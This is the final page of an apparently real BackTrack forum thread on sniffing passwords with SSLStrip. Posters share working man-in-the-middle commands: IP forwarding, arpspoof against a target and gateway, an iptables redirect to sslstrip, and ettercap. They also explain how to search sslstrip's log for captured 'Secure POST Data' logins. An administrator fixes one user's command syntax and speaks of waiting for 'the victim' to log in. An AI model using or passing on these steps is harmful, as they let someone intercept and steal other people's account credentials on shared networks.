Page 4 of 4 FirstFirst ... 234
Results 31 to 36 of 36

Thread: Sickness - Password Sniffing with SSLStrip.

  1. #31
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Sickness - Password Sniffing with SSLStrip.

    Quote Originally Posted by Eatme View Post
    doing this will write out a log file as well as show in "real time" every time someone logs in a website thats HTTPS or has forms with user/password/email etc..

    2nd command will filter out the specific logins. (most/all sites will have either a form with email or pass in it)
    Yea that's a nice method to ease your work
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  2. #32
    Good friend of the forums Eatme's Avatar
    Join Date
    Aug 2009
    Location
    Socks5
    Posts
    308

    Default

    thanks sir..

    Also another way of doing it (which I think is BEST)

    sslstrip -a -k -f -l 8080

    kate sslstrip.log

    Ctrl+F (find)
    Ctrl+v (past) "Secure POST Data"

    and you will see the following (Ex: login.yahoo.com) login details within the next line.

    F3 will guide you through all of your logins by order of entry.

    Hope this helps anyone who is having trouble filtering out all the bs in the logs...

    Last edited by Eatme; 09-13-2010 at 12:24 PM.
    Wiffy-Auto-Cracker - was the best thing that ever happen to me. :) Wo0oT :)
    AWUSO36H_500mW_5dBi Antenna

  3. #33
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    7

    Default Re: Sickness - Password Sniffing with SSLStrip.

    great tutorial,, althou im wondering, what command in here, is it that gives no warning?
    and how do you know what to grep for? and when to do it?

    also with this i noticed you did not sign into yahoo mail, is it becouse account did not exist? im guessing that anyway :P
    i kinda lol'd when i saw "w00t no warning" then "wrong account info" in other window ^^

  4. #34
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Sickness - Password Sniffing with SSLStrip.

    Quote Originally Posted by krillerill View Post
    great tutorial,, althou im wondering, what command in here, is it that gives no warning?
    and how do you know what to grep for? and when to do it?

    also with this i noticed you did not sign into yahoo mail, is it becouse account did not exist? im guessing that anyway :P
    i kinda lol'd when i saw "w00t no warning" then "wrong account info" in other window ^^
    Well it was not a valid yahoo account, but if it were valid it would have signed in. The questions about what to grep for have been answered by Eatme pretty much and the question about when to do it, really depends on when the victim logs in
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  5. #35
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    4

    Default Re: Sickness - Password Sniffing with SSLStrip.

    Hi,

    I successfully ran sslstrip within my own network against my second laptop, and it worked perfectly. However, subsequent attempts against that laptop are not working. For one thing, when I check the MAC address on the victim machine (arp -a) I am not getting the same results as I did on the first attempt. Also, the log file I am keeping on the attacker machine is empty. Most importantly, when I went to gmail (on subsequent attempts) I got https instead of http.

    Here are the commands I used on the first (and subsequent attempts):

    cd sslstrip-0.7
    echo 1 > /proc/sys/net/ipv4/ip-forward

    arpspoof -1 wlan0 -t 192.168.5 192.168.2.1

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

    python sslstrip.py -w logfile

    Running backtrack 4

    I am wondering whether there are any specific commands I should have run after the first attempt to terminate/kill some of these processes, keeping in mind that after the first successful attempt I completely shut down the attacker machine and put the victim machine into sleep mode before attempting subsequent attempts (and I rebooted the wireless router).

    Any ideas welcome

    Thanks
    Vindal

  6. #36
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Sickness - Password Sniffing with SSLStrip.

    Ok so first of all, check that you have no firewall on.
    Second I would suggest you do this using ettercap too like this:

    Your command looks like this:
    [CODE]echo 1 > /proc/sys/net/ipv4/ip-forward[/CODE
    When it should look like this:
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    Next:
    Code:
    arpspoof -i wlan0 -t target gateway (not arpspoof -1)
    sslstrip -a -f -k
    If you also want ettercap here, you edit /etc/etter.conf and then type
    Code:
     ettercap -T -q -i wlan0
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Page 4 of 4 FirstFirst ... 234

Similar Threads

  1. ARP Poisoning 101 (Not sniffing info...)
    By Whiskey in forum Beginners Forum
    Replies: 12
    Last Post: 07-15-2010, 02:12 AM
  2. sslstrip w/ My Wired-Wireless Network
    By MassAppeal in forum Beginners Forum
    Replies: 11
    Last Post: 02-11-2010, 05:56 AM
  3. Sickness - Password Sniffing Reloaded.
    By sickness in forum BackTrack Videos
    Replies: 8
    Last Post: 02-06-2010, 01:12 PM
  4. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •